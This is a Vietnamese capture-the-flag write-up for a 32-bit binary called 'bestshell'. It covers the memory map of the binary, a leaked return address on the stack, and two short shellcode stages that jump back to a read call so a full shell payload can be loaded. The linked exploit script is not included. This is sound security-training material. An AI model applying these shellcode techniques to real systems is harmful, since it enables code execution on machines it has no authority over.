# Bestshell

> Cũng như mọi lần, lần này thấy địa chỉ trong IDA là lạ, thử kiểm tra qua cái file đó.

`file bestshell`
* bestshell: ELF 32-bit LSB `shared object`, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=f083b7c0e51e129740edb1ed6797d9782bee75d8, `not stripped`
* Cái này chắc tác giả muốn làm debug khó nhưng không làm khó dk mình.

## Hàm main

> Cái gì thì cái cũng phải hiểu chương trình cái nhỉ?

![main](img/main.PNG)

* Xem qua thì thấy shell gì mà 5byte. Nguyên cái /bin/sh đã éo đủ rồi.
* Nhưng mình thắc mắc cái đoạn `read(0, &buf, 8u)` lại còn hỏi?
-> Mình nghĩ liệu 5 + 8 - 1 = 12byte( -1 bởi vì "Y")  mình thử check xem buf có được excute không? và Hoàn toàn là dk nhé:

```
gdb-peda$ vmm
Start      End        Perm	Name
0x56555000 0x56556000 r-xp	/home/dlufy/lab/acebear/bestshell
0x56556000 0x56557000 r-xp	/home/dlufy/lab/acebear/bestshell
0x56557000 0x56558000 rwxp	/home/dlufy/lab/acebear/bestshell
0xf7e02000 0xf7fb2000 r-xp	/lib/i386-linux-gnu/libc-2.23.so
0xf7fb2000 0xf7fb4000 r-xp	/lib/i386-linux-gnu/libc-2.23.so
0xf7fb4000 0xf7fb5000 rwxp	/lib/i386-linux-gnu/libc-2.23.so
0xf7fb5000 0xf7fb8000 rwxp	mapped
0xf7fd3000 0xf7fd5000 rwxp	mapped
0xf7fd5000 0xf7fd7000 r--p	[vvar]
0xf7fd7000 0xf7fd9000 r-xp	[vdso]
0xf7fd9000 0xf7ffb000 r-xp	/lib/i386-linux-gnu/ld-2.23.so
0xf7ffb000 0xf7ffc000 rwxp	mapped
0xf7ffc000 0xf7ffd000 r-xp	/lib/i386-linux-gnu/ld-2.23.so
0xf7ffd000 0xf7ffe000 rwxp	/lib/i386-linux-gnu/ld-2.23.so
0xfffdd000 0xffffe000 rwxp	[stack]
```

* Nếu như thế sẽ mất một đoạn shellcode là `jmp address_buf` mà address_buf còn chưa biết
* dù biết address_buf thì mình tính đi tính lại cung không đủ.

## Debug và có hint

> Thật may mắn khi debug mình phát hiện ra trên stack có chứa địa chỉ `0xffffcf7c --> 0x565559c8 (<main+392>` và tiếp theo là `0xffffcf80 --> 0x6ce88359` (address var buf) 

* Mình tính sẽ thực hiện nhảy về  tại địa chỉ gần read(0, buf, size(on stack)) khi đó mình có thể đọc với độ dài nhiều hơn. và mình sẽ đọc một con shell 32bit
```
.text:0000095A                 push    5               ; nbytes
.text:0000095C                 push    offset shell    ; buf        <-- mình sẽ nhảy tới đây (2)
.text:00000961                 push    0               ; fd
.text:00000963                 call    read
```

## Thực hiện

* Mình tận dụng 2 biến buf và shell để chứa my shellcode.
* Biến shell
```
pop    eax ; chứa 0x565559c8 (<main+392>...
jmp    esp ; lúc này esp chứa địa chỉ của biến buf
```
* Biến buf
```
sub    eax,0x6c ; main+382 - 0x6c = (2)mô tả phần trên
jmp    eax
```

## Mã Khai thác
![exploit](bestshell.py)